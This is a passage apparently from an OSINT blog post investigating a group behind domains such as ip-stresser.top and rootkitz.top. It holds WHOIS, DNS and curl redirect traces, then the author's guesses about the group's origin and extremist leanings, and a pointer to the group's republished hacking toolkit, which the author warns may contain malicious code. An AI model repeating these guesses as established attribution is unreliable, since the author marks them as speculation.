Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
ip-stresser.top. 300 IN A 104.21.77.142
ip-stresser.top. 300 IN A 172.67.208.235
Domain Name: ip-stresser.top
Registry Domain ID: D20230113G10001G_94524450-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2023-01-12T16:17:18Z
Creation Date: 2023-01-12T16:03:31Z
Registry Expiry Date: 2024-01-12T16:03:31Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
malwarez.top. 300 IN A 172.67.159.163
malwarez.top. 300 IN A 104.21.50.91
Domain Name: malwarez.top
Registry Domain ID: D20221018G10001G_89708920-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-10-18T20:26:31Z
Creation Date: 2022-10-17T17:45:03Z
Registry Expiry Date: 2023-10-17T17:45:03Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
pornoportugues.top. 300 IN A 172.67.164.98
pornoportugues.top. 300 IN A 104.21.66.213
Domain Name: pornoportugues.top
Registry Domain ID: D20220827G10001G_86946404-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-27T00:00:43Z
Creation Date: 2022-08-26T23:53:52Z
Registry Expiry Date: 2023-08-26T23:53:52Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
rootkitz.top. 300 IN A 104.21.71.183
rootkitz.top. 300 IN A 172.67.147.250
Domain Name: rootkitz.top
Registry Domain ID: D20221018G10001G_89708918-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-10-18T20:25:47Z
Creation Date: 2022-10-17T17:45:02Z
Registry Expiry Date: 2023-10-17T17:45:02Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
search-1337.cfd. 300 IN A 172.67.161.179
search-1337.cfd. 300 IN A 104.21.15.50
Domain Name: SEARCH-1337.CFD
Registry Domain ID: D310075066-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:51:12.0Z
Creation Date: 2022-07-19T16:43:11.0Z
Registry Expiry Date: 2023-07-19T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
top-product.top. 300 IN A 104.21.84.156
top-product.top. 300 IN A 172.67.194.145
Domain Name: top-product.top
Registry Domain ID: D20220720G10001G_84864269-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-06T16:26:49Z
Creation Date: 2022-07-19T20:13:38Z
Registry Expiry Date: 2023-07-19T20:13:38Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
$ curl -i https://skidson.online
HTTP/2 302
date: Sun, 19 Feb 2023 13:08:49 GMT
content-type: text/html; charset=UTF-8
location: https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631
cache-control: no-cache
referrer-policy: no-referrer
cf-cache-status: DYNAMIC
server-timing: cf-q-config;dur=6.0000020312145e-06
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5w87bQMeTS6%2F8lxbj4DON369ZMVlnDi58pDQSrcLiAEpRvAKmtIGpbNVq21il%2FoBmEEyGzp0Qz3060nDnwn%2FQl3uJBfyH4A8xfMCiGKg8aY2FGlF6kfZ0j39ZhpsZQ3HPw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 79bf3bc36d6d2caf-ORD
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
$ curl -i "https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631"
HTTP/1.1 500 Internal Server Error
Server: nginx/1.17.6
Date: Sun, 19 Feb 2023 13:09:31 GMT
Content-Type: text/html
Content-Length: 177
Connection: close
<html>
<head><title>500 Internal Server Error</title></head>
<body>
<center><h1>500 Internal Server Error</h1></center>
<hr><center>nginx/1.17.6</center>
</body>
</html>
goshbiopsy.com. 188 IN A 173.233.139.164
goshbiopsy.com. 188 IN A 173.233.137.60
goshbiopsy.com. 188 IN A 173.233.137.52
goshbiopsy.com. 188 IN A 173.233.137.44
goshbiopsy.com. 188 IN A 173.233.137.36
goshbiopsy.com. 188 IN A 192.243.61.227
goshbiopsy.com. 188 IN A 192.243.61.225
goshbiopsy.com. 188 IN A 192.243.59.20
goshbiopsy.com. 188 IN A 192.243.59.13
goshbiopsy.com. 188 IN A 192.243.59.12
Registry Domain ID: 2637923644_DOMAIN_COM-VRSN
Registrar WHOIS Server: WHOIS.ENOM.COM
Registrar URL: WWW.ENOM.COM
Updated Date: 2022-08-03T09:47:16.00Z
Creation Date: 2021-09-01T01:20:00.00Z
Registrar Registration Expiration Date: 2023-09-01T01:20:14.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street:
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: N/A
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CZ
NetRange: 173.233.128.0 - 173.233.159.255
CIDR: 173.233.128.0/19
NetName: SERVERS-COM
NetHandle: NET-173-233-128-0-1
Parent: NET173 (NET-173-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS7979
Organization: Servers.com, Inc. (SERVE-105)
RegDate: 2015-06-04
Updated: 2019-07-05
Ref: https://rdap.arin.net/registry/ip/173.233.128.0
OrgName: Servers.com, Inc.
OrgId: SERVE-105
Address: 2777 N. Stemmons Fwy
Address: Suite 1655
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US
RegDate: 2014-10-16
Updated: 2015-02-19
Ref: https://rdap.arin.net/registry/entity/SERVE-105
NetRange: 192.243.48.0 - 192.243.63.255
CIDR: 192.243.48.0/20
NetName: ADVANCEDHOSTERS-NET
NetHandle: NET-192-243-48-0-1
Parent: NET192 (NET-192-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS39572
Organization: Internet Service Solution Corp. (ISSC-11)
RegDate: 2012-10-08
Updated: 2014-03-18
Ref: https://rdap.arin.net/registry/ip/192.243.48.0
OrgName: Internet Service Solution Corp.
OrgId: ISSC-11
Address: 8 Copthall
City: Roseau Valley
StateProv:
PostalCode: 00152
Country: DM
RegDate: 2012-09-24
Updated: 2014-03-18
Comment: http://www.advancedhosters.com
Ref: https://rdap.arin.net/registry/entity/ISSC-11
possible locales: China, Portugal, Czechia, Slovenia, Other
namesilo in Arizona
servers.com in Dallas, Texas
advancedhosters.net in Dominica
I don’t think any of what this crew does is technically illegal, at least what they publish outright. There could be things they do in private obviously with these scripts, but anything that I’m looking at directly does not indicate direct illegality. As a result, I have no reason to publish anything about their identities directly, so I have obfuscated everything on that front.
However, the code is very informative on how some adversaries operate. Even if most of the techniques themselves are not difficult, seeing the specific tools used (ffuf, httprobe, nuclei, assetfinder), and code developed is informative. They are definitely not unskilled and have demonstrated in their chats their own skill.
Initially they seem to have started out as an AdventureQuest World private server. I’m not sure if they were purchased by an SEO monetization system or if it’s the original team that has just repositioned themselves.
Their politics appear to be that of a pro-Russia stance and perhaps(?) some racism. I make this conclusion by two of their core members having mutual Discord servers with myself where the stopped posting information about the Ukrainian war immediately after invasion began. Also, they have posted many pro-Russian statements.
They have also posted this flag with an anime character affixed:
So they could be Slovenian. That makes things hard given they speak no Russian or Slovenian in this server, just English and Portuguese. This makes me believe that they are just masking their origin even further. This is Astolfo, a character from TYPE-MOON, so it could be unrelated entirely:
https://typemoon.fandom.com/wiki/Astolfo
I have seen this character used in anti-trans extremist communities, so that could be part of it as well. I know very little if anything about TYPE-MOON, but Astolfo looking very very feminine, seems to be listed as male so could represent the trans community to some extremists. This also could mean they are ANTI-Slovenian, who knows.
They also cannot stop using the N-word. That is even quoted above. This is interspersed with fake arguments about BLM, which is really just there to agitate for no real reason other than to appeal to anger the users in the server. I’m not really sure what their goal is there, perhaps to get someone to report them so they can move to a new server and know who is a “glowie” so they can move on.
They also created, REALLY early on during the leaking of LLaMA, their own “BasedGPT” Discord bot that was spewing nothing but racism, conspiracy theories, and fairly accurate depictions of high level security topics.
Racism is used in hacking circles mostly to weed out people or to specifically block certain things from being analyzed. It can also be used to confuse, distract, or intimidate.
Back to the crew, I’ve stated this before and I’ll state it again, I do not understand why people seek out paranoid states as someone who is naturally paranoid. It’s not healthy, and I wish I had a choice like they do, yet they squander their lives deep in it. I’ve heard from various accounts of people leaving this life of SEO crime and their lives getting better from a mental health perspective as well as financially. Some people have to learn the hard way, but to each their own.
There were also a lot of hacking tools available on their GitHub page which was removed by them slowly. I am publishing their entire toolkit here which used to exist under https://github.com/chakal1337.
Please be aware that this could contain malicious code, including embedded Javascript in the HTML, or code that could be used for malicious or tracking purposes. All code is to be used for research purposes only, and be careful when analyzing. Much of the real interesting stuff can be found in old commits that were torched with later commits replacing it with JS analytics to monitor you if you open the HTML, so be careful and open in a non-network connected VM. You have been warned.